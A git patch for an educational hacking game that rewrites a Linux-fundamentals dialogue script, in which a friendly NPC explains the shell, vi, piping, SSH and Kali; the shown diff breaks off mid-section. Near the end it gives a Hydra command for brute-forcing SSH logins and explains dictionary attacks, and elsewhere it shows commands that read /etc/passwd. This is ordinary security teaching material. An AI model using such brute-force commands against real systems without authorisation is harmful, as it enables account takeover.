From be497931ded69eee3785b19f33ceafd44504099c Mon Sep 17 00:00:00 2001
From: "Z. Cliffe Schreuders"
Date: Wed, 19 Nov 2025 18:24:26 +0000
Subject: [PATCH] feat: Create reusable tool explanations and update intro_linux for game narrative

- Add nmap_basics.ink, metasploit_basics.ink, netcat_basics.ink as reusable tools
- Completely rewrite intro_linux.ink:
- Remove all unnecessary tracking variables
- Change from 'Tech Instructor' to 'Haxolottle'
- Remove lab/training/exercise language
- Convert to helpful NPC offering to explain concepts
- Keep all technical content but make conversational
- Link to reusable tool files where appropriate
- Use proper ink patterns (hub structure, #exit_conversation)
---
 .../ink/game_scenarios/intro_linux.ink | 1016 +++++------------
 .../tools/metasploit_basics.ink | 148 +++
 .../game_scenarios/tools/netcat_basics.ink | 98 ++
 .../ink/game_scenarios/tools/nmap_basics.ink | 85 ++
 4 files changed, 640 insertions(+), 707 deletions(-)
 create mode 100644 story_design/ink/game_scenarios/tools/metasploit_basics.ink
 create mode 100644 story_design/ink/game_scenarios/tools/netcat_basics.ink
 create mode 100644 story_design/ink/game_scenarios/tools/nmap_basics.ink

diff --git a/story_design/ink/game_scenarios/intro_linux.ink b/story_design/ink/game_scenarios/intro_linux.ink
index be48723..adcd3e8 100644
--- a/story_design/ink/game_scenarios/intro_linux.ink
+++ b/story_design/ink/game_scenarios/intro_linux.ink
@@ -1,942 +1,544 @@ -// =========================================== -// LINUX FUNDAMENTALS AND SECURITY LAB -// Introduction to Linux and Security -// =========================================== -// Game-Based Learning replacement for lab sheet -// Original: introducing_attacks/1_intro_linux.md -// =========================================== +// Linux Fundamentals - Game Scenario Version +// Helpful NPC dialogue for understanding Linux and security tools -// Progress tracking -VAR linux_basics_discussed = false -VAR command_line_skills_discussed = false -VAR vi_editor_discussed = false -VAR piping_discussed = false -VAR redirection_discussed = false -VAR networking_discussed = false -VAR ssh_discussed = false -VAR hydra_discussed = false -VAR kali_intro_discussed = false - -// Detailed topic tracking -VAR pwd_ls_discussed = false -VAR file_manipulation_discussed = false -VAR man_pages_discussed = false -VAR piping_examples_discussed = false -VAR redirection_examples_discussed = false -VAR ifconfig_discussed = false -VAR ssh_basics_discussed = false -VAR ssh_x_forwarding_discussed = false -VAR bruteforce_basics_discussed = false - -// Challenge completion -VAR completed_vi_challenge = false -VAR completed_piping_challenge = false -VAR completed_ssh_challenge = false -VAR completed_hydra_challenge = false - -// Instructor relationship -VAR instructor_rapport = 0 -VAR deep_dives_completed = 0 +// Global persistent state only +VAR haxolottle_rapport = 0 // External variables EXTERNAL player_name -// =========================================== -// ENTRY POINT - LINUX INSTRUCTOR -// =========================================== - === start === -~ instructor_rapport = 0 +Haxolottle: Hey there, {player_name}! Need some help with Linux? -Tech Instructor: Welcome to Linux Fundamentals and Security, Agent {player_name}. I'm your technical instructor for this session. 
+~ haxolottle_rapport = 0 -Tech Instructor: This lab covers essential Linux command-line skills, remote administration via SSH, and basic penetration testing techniques. All crucial skills for field operations. +Haxolottle: I know these command-line interfaces can be intimidating at first, little axolotl. -Tech Instructor: Think of this as building your foundational toolkit. Every SAFETYNET agent needs to be comfortable in Linux environments—most of our targets run Linux servers, and Kali Linux is our primary offensive platform. +Haxolottle: But trust me, once you get the hang of it, you'll wonder how you ever lived without it. --> linux_training_hub +Haxolottle: What would you like to know about? -// =========================================== -// MAIN TRAINING HUB -// =========================================== +-> linux_hub -=== linux_training_hub === +=== linux_hub === +Haxolottle: What can I help you understand? -Tech Instructor: What would you like to cover? - -+ {not linux_basics_discussed} [Learn about Linux basics and why it matters] - -> linux_basics_intro -+ {not command_line_skills_discussed} [Essential command-line skills] - -> command_line_skills -+ {not vi_editor_discussed} [Learn the vi editor] - -> vi_editor_intro -+ {not piping_discussed} [Piping between programs] - -> piping_intro -+ {not redirection_discussed} [Redirecting input and output] - -> redirection_intro -+ {not networking_discussed} [Basic Linux networking] - -> networking_basics -+ {not kali_intro_discussed} [Introduction to Kali Linux] - -> kali_intro -+ {not ssh_discussed} [Remote shell access with SSH] - -> ssh_intro -+ {not hydra_discussed} [Attacking SSH with Hydra] - -> hydra_intro -+ {linux_basics_discussed and command_line_skills_discussed} [Show me the essential commands reference] ++ [Why Linux? Why not just use Windows?] 
+ -> why_linux ++ [Basic command-line navigation] + -> command_line_basics ++ [The vi text editor] + -> vi_editor ++ [Piping commands together] + -> piping ++ [Redirecting output to files] + -> redirection ++ [Linux networking basics] + -> networking ++ [SSH - connecting to remote systems] + -> ssh_basics ++ [Hydra - password attacks] + -> hydra_tool ++ [What's Kali Linux?] + -> kali_linux ++ [Show me a commands cheat sheet] -> commands_reference -+ {ssh_discussed or hydra_discussed} [Tips for the hands-on challenges] - -> challenge_tips -+ [I'm ready to start the practical exercises] - -> ready_for_practice -+ [That's all I need for now] - -> end_session ++ [I'm good for now, thanks] + #exit_conversation + -> END -// =========================================== -// LINUX BASICS -// =========================================== +=== why_linux === +Haxolottle: Good question! Linux runs most of the servers on the internet. -=== linux_basics_intro === -~ linux_basics_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Tech Instructor: Excellent starting point. Let me explain why Linux matters for security work. +Haxolottle: Web servers, database servers, email servers - they're almost all Linux. -Tech Instructor: Linux is the backbone of modern internet infrastructure. Google, Facebook, Amazon—they all run Linux servers at massive scale. When you're conducting penetration tests or investigating security incidents, you'll encounter Linux systems constantly. +Haxolottle: So if you need to access those systems, you better know your way around Linux. -Tech Instructor: More importantly for us, the best security tools are Linux-native. Kali Linux contains hundreds of specialized tools for penetration testing, forensics, and security analysis. Mastering Linux means mastering your toolkit. +Haxolottle: Plus, all the best security tools are built for Linux. Kali Linux is packed with them. 
-Tech Instructor: Linux comes in many "distributions"—different flavors packaged for different purposes. Ubuntu for ease of use, Debian for stability, Kali for security testing. They all share the same core commands and concepts, so learning one helps you understand them all. ++ [What makes Linux good for security work?] + Haxolottle: A few things, really. -* [Why not just use Windows?] - ~ deep_dives_completed += 1 - You: Why can't we just use Windows for security work? - -> windows_comparison -* [What makes Kali special?] - ~ deep_dives_completed += 1 - You: What specifically makes Kali Linux the industry standard? - -> kali_explanation -* [Got it, let's move on] - You: Understood. Linux is essential for security work. - -> linux_training_hub + Haxolottle: Open source - you can see exactly what the code does, no hidden backdoors. -=== windows_comparison === -~ instructor_rapport += 8 + Haxolottle: Command-line focused - scripts and automation are easy. -Tech Instructor: Fair question. Windows absolutely has its place—many enterprise environments are Windows-heavy, and you'll need those skills too. + Haxolottle: Powerful tools - Nmap, Metasploit, Wireshark, all built for Linux first. -Tech Instructor: But for offensive security work, Linux has three major advantages: + Haxolottle: And the community - security researchers love Linux, so that's where the tools are. -Tech Instructor: **First**, the tools. Most cutting-edge security research happens in the open-source community, and those tools are Linux-first. Sure, some get ported to Windows eventually, but you'll always be behind the curve. ++ [Tell me about Kali Linux specifically] + -> kali_linux -Tech Instructor: **Second**, the control. Linux gives you deep system access and transparency. You can see exactly what's happening, modify anything, and automate everything. That level of control is crucial when you're trying to exploit systems or analyze malware. 
+- -> linux_hub -Tech Instructor: **Third**, the culture. The security community lives in Linux. Understanding Linux means understanding how other security professionals work, communicate, and share knowledge. +=== command_line_basics === +Haxolottle: The command line is your interface to the system, little axolotl. -~ instructor_rapport += 5 --> linux_training_hub +~ haxolottle_rapport += 5 -=== kali_explanation === -~ instructor_rapport += 8 +Haxolottle: Instead of clicking icons, you type commands. More powerful, faster once you know it. -Tech Instructor: Kali is essentially a curated arsenal of security tools, all pre-configured and ready to use. +Haxolottle: Let me show you the essentials. -Tech Instructor: Offensive Security—the company behind Kali—maintains hundreds of tools across every category: information gathering, vulnerability analysis, wireless attacks, exploitation, post-exploitation, forensics, you name it. ++ [How do I see where I am?] + Haxolottle: Use pwd - "print working directory" -Tech Instructor: What makes Kali special isn't just the tools, though. It's the integration. Everything works together. The tools are kept up-to-date. Documentation is solid. And it's become the lingua franca of penetration testing—when security professionals share techniques, they assume you're using Kali. + Haxolottle: It shows your current location in the file system. -Tech Instructor: Think of it like this: you *could* build your own toolkit from scratch, hunting down each tool individually and figuring out dependencies. Or you could use Kali and get straight to the actual security work. + Haxolottle: Like: /home/kali or /root or /etc -~ instructor_rapport += 5 --> linux_training_hub ++ [How do I see what files are here?] 
+ Haxolottle: Use ls - "list" -// =========================================== -// COMMAND-LINE SKILLS -// =========================================== + Haxolottle: Basic: ls shows files and directories -=== command_line_skills === -~ command_line_skills_discussed = true -~ instructor_rapport += 5 + Haxolottle: Detailed: ls -la shows hidden files, permissions, sizes, everything -Tech Instructor: Right, let's build your command-line fundamentals. These are skills you'll use every single day in the field. + Haxolottle: The -l flag means "long format" and -a means "all files including hidden ones" -Tech Instructor: The command line might seem archaic compared to graphical interfaces, but it's exponentially more powerful. You can automate tasks, chain commands together, work on remote systems, and handle massive datasets—all from a simple text interface. ++ [How do I move around?] + Haxolottle: Use cd - "change directory" -Tech Instructor: I'll cover the essential commands: navigating the filesystem, manipulating files and directories, viewing content, and getting help when you're stuck. + Haxolottle: cd /etc moves to /etc directory -* [Show me the navigation commands] - ~ pwd_ls_discussed = true - You: How do I navigate the filesystem? - -> navigation_commands -* [How do I work with files?] - ~ file_manipulation_discussed = true - You: What about creating and editing files? - -> file_manipulation -* [How do I get help when stuck?] - ~ man_pages_discussed = true - You: What if I don't know what a command does? - -> man_pages -* [I want to see the full command reference] - You: Can I see a complete list of essential commands? - -> commands_reference + Haxolottle: cd .. goes up one level -=== navigation_commands === -~ instructor_rapport += 3 + Haxolottle: cd ~ or just cd goes to your home directory -Tech Instructor: Navigation is your foundation. Here are the essentials: ++ [How do I read file contents?] 
+ Haxolottle: Several ways: -Tech Instructor: **pwd** - "print working directory". Shows exactly where you are in the filesystem. Lost? Run pwd. + Haxolottle: cat filename - dumps the whole file to screen -Tech Instructor: **ls** - lists files in your current directory. Add "-la" for detailed information including hidden files and permissions. You'll use "ls -la" constantly. + Haxolottle: less filename - view file page by page (press q to quit) -Tech Instructor: **cd** - "change directory". Moves you around the filesystem. "cd .." goes up one level, "cd" alone takes you home. + Haxolottle: head filename - just the first 10 lines -Tech Instructor: Pro tip: pressing Tab autocompletes filenames and commands. Type a few letters, hit Tab, save yourself endless typing. And use the up arrow to cycle through previous commands. + Haxolottle: tail filename - just the last 10 lines -* [Tell me more about ls flags] - You: What other useful flags does ls have? - Tech Instructor: Great question. "ls -lt" sorts by modification time, newest first. "ls -lh" shows human-readable file sizes. "ls -lR" recursively lists subdirectories. You can combine them: "ls -lhta" shows all files, human-readable sizes, sorted by time. - ~ instructor_rapport += 5 - -> command_line_followup -* [What about hidden files?] - You: What are hidden files? - Tech Instructor: In Linux, files starting with "." are hidden—they don't show up in normal ls output. Configuration files are typically hidden. Use "ls -a" to see them. You'll frequently need to examine hidden config files during security assessments. - ~ instructor_rapport += 5 - -> command_line_followup -* [Got it] - -> command_line_followup ++ [How do I create, copy, move, or delete files?] + Haxolottle: Creating: touch filename makes an empty file -=== command_line_followup === -+ [Show me file manipulation commands] - -> file_manipulation -+ [How do I get help when stuck?] 
- -> man_pages -+ [Back to the main menu] - -> linux_training_hub + Haxolottle: Copying: cp source destination -=== file_manipulation === -~ instructor_rapport += 3 + Haxolottle: Moving/renaming: mv source destination -Tech Instructor: Creating, copying, moving, and viewing files. Bread and butter stuff. + Haxolottle: Deleting: rm filename (careful, no undo!) -Tech Instructor: **mkdir** - creates directories. "mkdir mydir" creates a new folder. + Haxolottle: Creating directories: mkdir dirname -Tech Instructor: **cp** - copies files. "cp source destination" copies a file. Add "-r" for recursive directory copying. ++ [How do I get help on commands?] + Haxolottle: Use man - "manual" -Tech Instructor: **mv** - moves or renames files. "mv oldname newname" renames. "mv file /path/to/destination/" moves it. + Haxolottle: man ls shows the manual for ls -Tech Instructor: **cat** - dumps file contents to the screen. "cat filename" shows the whole file. + Haxolottle: man ssh shows the manual for ssh -Tech Instructor: **echo** - prints text. "echo 'hello world'" displays text. Useful for testing and scripting. + Haxolottle: Press space to page down, q to quit -* [Tell me more about viewing files] - You: Cat seems limited for large files... - Tech Instructor: Exactly right. For large files, use **less**. "less filename" lets you scroll through, search with "/", quit with "q". Much more practical than cat for big files. - ~ instructor_rapport += 8 - -> command_line_followup -* [What about creating files?] - You: How do I create a new empty file? - Tech Instructor: Several ways. "touch filename" creates an empty file. Or redirect output: "echo 'content' > filename" creates a file with content. We'll cover redirection shortly. 
- ~ instructor_rapport += 5 - -> command_line_followup -* [Understood] - -> command_line_followup + Haxolottle: Or try command --help for quick help -=== man_pages === -~ man_pages_discussed = true -~ instructor_rapport += 8 ++ [Got it, thanks] + -> linux_hub -Tech Instructor: This is possibly the most important skill: learning to teach yourself. +- -> linux_hub -Tech Instructor: **man** - the manual pages. "man command" shows comprehensive documentation for any command. Navigation: space to page down, "b" to page up, "/" to search, "q" to quit. +=== vi_editor === +Haxolottle: Ah, vi. The editor people love to hate until they love it. -Tech Instructor: Example: "man ls" shows every flag and option for ls. The man pages are detailed, sometimes overwhelming, but they're authoritative. +~ haxolottle_rapport += 5 -Tech Instructor: Alternative: **info** command provides similar documentation, sometimes more detailed. +Haxolottle: It's on every Linux system, so you need to know the basics. -Tech Instructor: Pro tip: if you're really stuck, try "command --help" for a quick summary. Many tools also have online documentation, but man pages are always available, even when you're offline on a compromised system with no internet. +Haxolottle: Vi has modes - that's the weird part for beginners. -* [How do I search man pages?] - You: Can I search across all man pages for a topic? - Tech Instructor: Yes. "man -k keyword" searches all man page descriptions. "apropos keyword" does the same thing. Useful when you know what you want to do but not which command does it. - ~ instructor_rapport += 10 - -> command_line_followup -* [What if man pages are too dense?] - You: Man pages can be pretty technical... - Tech Instructor: True. For beginner-friendly explanations, try "tldr command"—it shows simplified examples. Or search online for "command examples". But learning to parse man pages is a skill worth developing. They're accurate, complete, and always available. 
- ~ instructor_rapport += 8 - -> command_line_followup -* [Makes sense] - -> command_line_followup ++ [What are these modes?] + Haxolottle: Two main modes: -// =========================================== -// VI EDITOR -// =========================================== + Haxolottle: **Command mode** - for navigation and commands (default when you open vi) -=== vi_editor_intro === -~ vi_editor_discussed = true -~ instructor_rapport += 5 + Haxolottle: **Insert mode** - for actually typing text -Tech Instructor: Ah, vi. The editor that's been causing both frustration and devotion since 1976. + Haxolottle: Press i to enter insert mode, Esc to go back to command mode. -Tech Instructor: Here's why you need to know vi: it's on *every* Unix and Linux system. When you SSH into a compromised server with minimal tools, vi will be there. Other editors might not be. ++ [How do I open a file?] + Haxolottle: vi filename opens or creates the file -Tech Instructor: Vi is modal. Two main modes: **normal mode** for commands, **insert mode** for typing text. + Haxolottle: You start in command mode. Press i to start typing. -Tech Instructor: The essentials: -- "vi filename" opens or creates a file -- Press "i" to enter insert mode (now you can type) -- Press Esc to return to normal mode -- In normal mode: ":wq" writes and quits, ":q!" quits without saving ++ [How do I save and quit?] + Haxolottle: From command mode (press Esc first if needed): -Tech Instructor: That's literally everything you need to survive vi. + Haxolottle: :w saves (write) -* [Tell me more about normal mode commands] - ~ deep_dives_completed += 1 - You: What else can I do in normal mode? - -> vi_advanced_commands -* [Why not use nano or another editor?] - You: Why not just use nano? It seems simpler. - Tech Instructor: Nano is fine for quick edits. But vi is universal and powerful. On hardened systems or embedded devices, vi might be your only option. Plus, once you learn it, vi is dramatically faster. 
Your call, but I recommend at least learning vi basics. - ~ instructor_rapport += 5 - -> vi_editor_followup -* [I'll learn the basics] - ~ completed_vi_challenge = true - You: Got it. I'll practice the essential commands. - -> vi_editor_followup + Haxolottle: :q quits -=== vi_advanced_commands === -~ instructor_rapport += 8 + Haxolottle: :wq saves and quits -Tech Instructor: Want to unlock vi's power? Here are some favorites: + Haxolottle: :q! quits without saving (force quit) -Tech Instructor: **Navigation in normal mode:** -- "h" "j" "k" "l" move cursor left, down, up, right -- "w" jumps forward by word, "b" jumps back -- "gg" jumps to start of file, "G" jumps to end ++ [Basic navigation in command mode?] + Haxolottle: Arrow keys work, but vi users use: -Tech Instructor: **Editing in normal mode:** -- "dd" deletes current line -- "30dd" deletes 30 lines -- "yy" copies (yanks) current line -- "p" pastes -- "u" undo -- "/" searches, "n" finds next match + Haxolottle: h (left), j (down), k (up), l (right) -Tech Instructor: You can combine commands: "d10j" deletes 10 lines down. "c3w" changes next 3 words. + Haxolottle: w (next word), b (back word) -Tech Instructor: Ten minutes with a vi tutorial will make you look like a wizard. It's worth it. + Haxolottle: 0 (start of line), $ (end of line) -~ instructor_rapport += 10 --> vi_editor_followup + Haxolottle: gg (start of file), G (end of file) -=== vi_editor_followup === -+ [Back to main menu] - -> linux_training_hub ++ [Quick reference?] + Haxolottle: Here's what you really need: -// =========================================== -// PIPING -// =========================================== + Haxolottle: Open: vi filename -=== piping_intro === -~ piping_discussed = true -~ instructor_rapport += 5 + Haxolottle: Enter insert mode: i -Tech Instructor: Piping is where Linux becomes genuinely powerful. You can chain simple commands together to accomplish complex tasks. 
+ Haxolottle: Exit insert mode: Esc -Tech Instructor: The pipe operator "|" sends the output of one command to the input of another. + Haxolottle: Save and quit: :wq -Tech Instructor: Example: "cat /etc/passwd | grep /home/" + Haxolottle: Quit without saving: :q! -Tech Instructor: This reads the passwd file and filters it to only lines containing "/home/". Two simple commands, combined to do something useful. + Haxolottle: That'll get you through 90% of situations. -Tech Instructor: You can chain multiple pipes: "cat /etc/passwd | grep /home/ | sort -r" - now it's filtered *and* sorted in reverse. ++ [I think I understand] + -> linux_hub -* [Show me more examples] - ~ piping_examples_discussed = true - You: What are some practical piping examples? - -> piping_examples -* [What commands work well with pipes?] - You: Which commands are commonly piped together? - -> piping_common_commands -* [I've got the concept] - ~ completed_piping_challenge = true - -> linux_training_hub +- -> linux_hub -=== piping_examples === -~ instructor_rapport += 8 +=== piping === +Haxolottle: Piping is beautiful, little axolotl. It's the Unix philosophy. -Tech Instructor: Here are real-world examples you'll use constantly: +~ haxolottle_rapport += 5 -Tech Instructor: **Finding running processes:** -"ps aux | grep ssh" - lists all processes, filters for SSH-related ones. +Haxolottle: Take the output of one program and feed it as input to another. -Tech Instructor: **Analyzing logs:** -"cat logfile | grep ERROR | sort | uniq -c | sort -nr" - finds errors, sorts them, counts unique occurrences, sorts by frequency. One line, powerful analysis. +Haxolottle: The pipe symbol is: | -Tech Instructor: **Network analysis:** -"netstat -an | grep ESTABLISHED" - shows active network connections. ++ [Show me an example] + Haxolottle: Classic example: ls -la | less -Tech Instructor: **Counting things:** -"ls | wc -l" - counts files in current directory. 
+ Haxolottle: List all files, but pipe it through less so you can scroll through it. -Tech Instructor: The Unix philosophy: small tools that do one thing well, combined creatively. Piping is how you combine them. + Haxolottle: Another: cat /etc/passwd | grep root -~ completed_piping_challenge = true -~ instructor_rapport += 5 --> linux_training_hub + Haxolottle: Show the passwd file, but filter for lines containing "root" -=== piping_common_commands === -~ instructor_rapport += 8 + Haxolottle: Or: ps aux | grep ssh -Tech Instructor: Commands that work brilliantly in pipes: + Haxolottle: List all processes, find the ones related to SSH. -Tech Instructor: **grep** - filters lines matching a pattern. Your most-used pipe command. ++ [What's grep?] + Haxolottle: Grep is your search tool - "Global Regular Expression Print" -Tech Instructor: **sort** - sorts lines alphabetically. "-n" for numeric sort, "-r" for reverse. + Haxolottle: grep pattern filename searches a file -Tech Instructor: **uniq** - removes duplicate adjacent lines. Usually used after sort. "-c" counts occurrences. + Haxolottle: grep -i pattern filename makes it case-insensitive -Tech Instructor: **head** and **tail** - show first or last N lines. "head -20" shows first 20 lines. + Haxolottle: grep -r pattern directory searches recursively -Tech Instructor: **wc** - word count. "-l" counts lines, "-w" counts words, "-c" counts characters. + Haxolottle: grep is incredibly powerful with piping. -Tech Instructor: **cut** - extracts columns from text. "cut -d: -f1" splits on colons, takes first field. ++ [Any other useful pipes?] + Haxolottle: Oh tons. Here are favorites: -Tech Instructor: **awk** and **sed** - powerful text processing. More advanced, but incredibly useful. + Haxolottle: command | wc -l counts lines of output -Tech Instructor: Learn these, and you can process massive datasets from the command line. 
+ Haxolottle: command | sort sorts the output -~ completed_piping_challenge = true -~ instructor_rapport += 5 --> linux_training_hub + Haxolottle: command | uniq removes duplicate lines -// =========================================== -// REDIRECTION -// =========================================== + Haxolottle: command | head -n 20 shows first 20 lines -=== redirection_intro === -~ redirection_discussed = true -~ instructor_rapport += 5 + Haxolottle: You can chain multiple: ls | grep .txt | wc -l (counts .txt files) -Tech Instructor: Redirection lets you send command output to files or read input from files. ++ [Got it] + -> linux_hub -Tech Instructor: Three key operators: +- -> linux_hub -Tech Instructor: **>** - redirects output to a file, overwriting it. "ls > filelist.txt" saves directory listing to a file. +=== redirection === +Haxolottle: Redirection lets you save output to files or read input from files. -Tech Instructor: **>>** - redirects output to a file, appending. "echo 'new line' >> file.txt" adds to the end. +~ haxolottle_rapport += 5 -Tech Instructor: **<** - reads input from a file. "wc -l < file.txt" counts lines in the file. +Haxolottle: Three main operators: >, <, and >> -Tech Instructor: Practical example: "ps aux > processes.txt" saves a snapshot of running processes for analysis. ++ [What does > do?] + Haxolottle: The > redirects output to a file (overwrites if it exists): -* [Show me more redirection examples] - ~ redirection_examples_discussed = true - You: What are some practical redirection scenarios? - -> redirection_examples -* [What about error messages?] - You: Can I redirect error messages too? 
- -> stderr_redirection -* [Understood] - -> linux_training_hub + Haxolottle: ls > files.txt saves the ls output to files.txt -=== redirection_examples === -~ instructor_rapport += 8 + Haxolottle: echo "Hello" > message.txt creates a file with that text -Tech Instructor: Practical redirection scenarios: + Haxolottle: Careful - it overwrites the file! -Tech Instructor: **Saving command output for later:** -"ifconfig > network_config.txt" - captures network configuration. ++ [What does >> do?] + Haxolottle: The >> appends to a file instead of overwriting: -Tech Instructor: **Building logs:** -"echo '$(date): Scan completed' >> scan_log.txt" - appends timestamped entries. + Haxolottle: echo "New line" >> message.txt adds to the end -Tech Instructor: **Combining with pipes:** -"cat /etc/passwd | grep /home/ > users.txt" - filters and saves results. + Haxolottle: Safer when you don't want to lose existing content. -Tech Instructor: **Quick file creation:** -"echo 'test content' > test.txt" - creates a file with content in one command. ++ [What does < do?] + Haxolottle: The < reads input from a file: -Tech Instructor: During security assessments, you'll constantly redirect command output to files for documentation and later analysis. + Haxolottle: mysql < database.sql feeds a SQL file to MySQL -~ instructor_rapport += 5 --> linux_training_hub + Haxolottle: sort < unsorted.txt sorts the file contents -=== stderr_redirection === -~ instructor_rapport += 10 + Haxolottle: Honestly, you'll use > and >> way more than < -Tech Instructor: Good catch. There are actually two output streams: stdout (standard output) and stderr (standard error). ++ [Can I combine piping and redirection?] + Haxolottle: Absolutely! They work great together: -Tech Instructor: By default, ">" only redirects stdout. Error messages still appear on screen. 
+ Haxolottle: cat file.txt | grep error | sort > errors.txt -Tech Instructor: To redirect stderr: "command 2> errors.txt" + Haxolottle: Search for errors, sort them, save to a file. -Tech Instructor: To redirect both: "command > output.txt 2>&1" - sends stderr to stdout, which goes to the file. + Haxolottle: ls -la | grep ".txt" >> text_files.txt -Tech Instructor: Or in modern Bash: "command &> output.txt" does the same thing more simply. + Haxolottle: Find .txt files, append to a list. -Tech Instructor: To discard output entirely: "command > /dev/null 2>&1" - sends everything to the void. ++ [Clear] + -> linux_hub -Tech Instructor: This is advanced stuff, but incredibly useful when scripting or when you want clean output. +- -> linux_hub -~ instructor_rapport += 10 --> linux_training_hub +=== networking === +Haxolottle: Linux networking - how to see your network config and connections. -// =========================================== -// NETWORKING BASICS -// =========================================== +~ haxolottle_rapport += 5 -=== networking_basics === -~ networking_discussed = true -~ instructor_rapport += 5 ++ [How do I see my IP address?] + Haxolottle: Two commands, depending on your Linux version: -Tech Instructor: Linux networking commands. Essential for understanding network configurations and troubleshooting connectivity. + Haxolottle: ip a or ip addr show (modern systems) -Tech Instructor: **ifconfig** - the classic command to view network interfaces and IP addresses. Shows all your network adapters. + Haxolottle: ifconfig (older systems, but still common) -Tech Instructor: **ip** - the modern replacement. "ip a s" (ip address show) does the same thing. You'll see both used in the field. + Haxolottle: Look for inet entries - that's your IP. -Tech Instructor: **hostname -I** - quick way to display just your IP address. ++ [How do I see active connections?] 
+ Haxolottle: netstat -tulpn shows listening ports and connections -Tech Instructor: In our environment, your IP typically starts with "172.22" or "10" - those are private network ranges. + Haxolottle: ss -tulpn is the modern replacement, faster -* [Tell me more about network interfaces] - ~ ifconfig_discussed = true - You: What are network interfaces exactly? - -> network_interfaces -* [How do I troubleshoot network issues?] - You: What if my network isn't working? - -> network_troubleshooting -* [What about finding other machines?] - You: How do I discover other systems on the network? - Tech Instructor: Good question, but that's scanning territory. We'll cover tools like nmap in the scanning module. For now, focus on understanding your own network configuration. - ~ instructor_rapport += 5 - -> linux_training_hub -* [Got it] - -> linux_training_hub + Haxolottle: -t is TCP, -u is UDP, -l is listening, -p is programs, -n is numeric (don't resolve names) -=== network_interfaces === -~ instructor_rapport += 8 ++ [How do I test network connectivity?] + Haxolottle: ping TARGET tests basic connectivity: -Tech Instructor: Network interfaces are how your computer connects to networks. Think of them as connection points. + Haxolottle: ping 8.8.8.8 checks if you can reach Google's DNS -Tech Instructor: **eth0, eth1** - Ethernet interfaces. Physical network ports. + Haxolottle: ping -c 4 TARGET sends just 4 packets (otherwise it's infinite) -Tech Instructor: **wlan0** - Wireless interface. WiFi adapter. ++ [I understand] + -> linux_hub -Tech Instructor: **lo** - Loopback interface, always 127.0.0.1. Your computer talking to itself. Useful for testing. +- -> linux_hub -Tech Instructor: **Virtual interfaces** - VPNs and containers create virtual interfaces like tun0, tap0, docker0. +=== ssh_basics === +Haxolottle: SSH - Secure Shell - is how you connect to remote Linux systems. 
-Tech Instructor: When you run ifconfig, you see all interfaces, their IP addresses, MAC addresses, and traffic statistics. Essential information for network security assessments. +~ haxolottle_rapport += 5 -~ instructor_rapport += 5 --> linux_training_hub +Haxolottle: It's encrypted, so your commands and passwords aren't sent in plaintext. -=== network_troubleshooting === -~ instructor_rapport += 8 ++ [How do I connect with SSH?] + Haxolottle: Basic: ssh username@hostname -Tech Instructor: Basic network troubleshooting steps: + Haxolottle: Like: ssh root@10.0.0.5 -Tech Instructor: **Step 1:** Check interface status with "ifconfig" or "ip a s". Is the interface up? Does it have an IP? + Haxolottle: It'll ask for the password, then you're in. -Tech Instructor: **Step 2:** If no IP, try "dhclient eth0" to request one from DHCP server. + Haxolottle: To exit the SSH session, type exit or press Ctrl-D -Tech Instructor: **Step 3:** Test local connectivity: "ping 127.0.0.1" tests your network stack. ++ [What if SSH is on a different port?] + Haxolottle: Use -p flag: ssh -p 2222 username@hostname -Tech Instructor: **Step 4:** Test gateway: "ping your_gateway_ip" tests local network. + Haxolottle: Default is port 22, but admins sometimes change it. -Tech Instructor: **Step 5:** Test DNS: "ping google.com" tests name resolution and external connectivity. ++ [Can I run GUI programs over SSH?] + Haxolottle: Yes! Use X forwarding: ssh -X username@hostname -Tech Instructor: In our lab environment, if you're having issues, usually dhclient fixes it. In the field, troubleshooting can be much more complex. + Haxolottle: Then you can run graphical programs and they display on your screen. -~ instructor_rapport += 5 --> linux_training_hub + Haxolottle: Like: ssh -X user@10.0.0.5 then run firefox -// =========================================== -// KALI LINUX -// =========================================== + Haxolottle: The program runs on the remote system but displays locally. 
-=== kali_intro === -~ kali_intro_discussed = true -~ instructor_rapport += 5 ++ [What about SSH keys instead of passwords?] + Haxolottle: Way more secure! Generate keys with: ssh-keygen -Tech Instructor: Kali Linux. Your primary offensive security platform. + Haxolottle: Copy your public key to the server: ssh-copy-id user@host -Tech Instructor: Released by Offensive Security in 2013 as the successor to BackTrack Linux. It's specifically designed for penetration testing, security auditing, and digital forensics. + Haxolottle: Then you can log in without typing a password. -Tech Instructor: Kali includes hundreds of pre-installed tools organized by category: information gathering, vulnerability analysis, wireless attacks, web applications, exploitation tools, password attacks, forensics, and more. + Haxolottle: The server checks your private key (which never leaves your machine). -Tech Instructor: Default credentials: username "kali", password "kali". Never use Kali as your primary OS—it's designed for security testing, not everyday computing. ++ [Got it] + -> linux_hub -* [Show me what tools are available] - You: What kinds of tools are we talking about? - -> kali_tools_overview -* [How is Kali organized?] - You: How do I find the right tool for a task? - -> kali_organization -* [Sounds powerful] - -> linux_training_hub +- -> linux_hub -=== kali_tools_overview === -~ instructor_rapport += 8 +=== hydra_tool === +Haxolottle: Hydra is a password cracker, little axolotl. -Tech Instructor: Let me give you a taste of what's available: +~ haxolottle_rapport += 5 -Tech Instructor: **Information Gathering:** nmap, dnsenum, whois, recon-ng. Tools for mapping networks and gathering intelligence. +Haxolottle: It does brute force and dictionary attacks against login services. -Tech Instructor: **Vulnerability Analysis:** Nessus, OpenVAS, nikto. Automated scanners that identify security weaknesses. +Haxolottle: SSH, FTP, HTTP, you name it - Hydra can attack it. 
-Tech Instructor: **Exploitation:** Metasploit Framework, BeEF, sqlmap. Tools for actively exploiting vulnerabilities. ++ [How does it work?] + Haxolottle: Hydra tries many username/password combinations rapidly. -Tech Instructor: **Password Attacks:** Hydra, John the Ripper, hashcat. Cracking and bruteforcing credentials. + Haxolottle: You give it a wordlist of passwords, and it tries each one. -Tech Instructor: **Wireless Attacks:** Aircrack-ng, Reaver, Wifite. WiFi security testing. + Haxolottle: Eventually it finds one that works (if it's in the wordlist). -Tech Instructor: **Forensics:** Autopsy, Sleuth Kit, Volatility. Analyzing systems and recovering data. ++ [Show me the basic command] + Haxolottle: For SSH: hydra -l username -P passwordlist.txt ssh://TARGET -Tech Instructor: And those are just highlights. Run "ls /usr/bin" to see hundreds more. It's an arsenal. + Haxolottle: -l is the login name (single user) -~ instructor_rapport += 5 --> linux_training_hub + Haxolottle: -P is the password file (capital P for file) -=== kali_organization === -~ instructor_rapport += 8 + Haxolottle: Or use -L for a user list and -p for a single password -Tech Instructor: Kali organizes tools by the penetration testing lifecycle: ++ [Where do I get password lists?] + Haxolottle: Kali Linux comes with some: 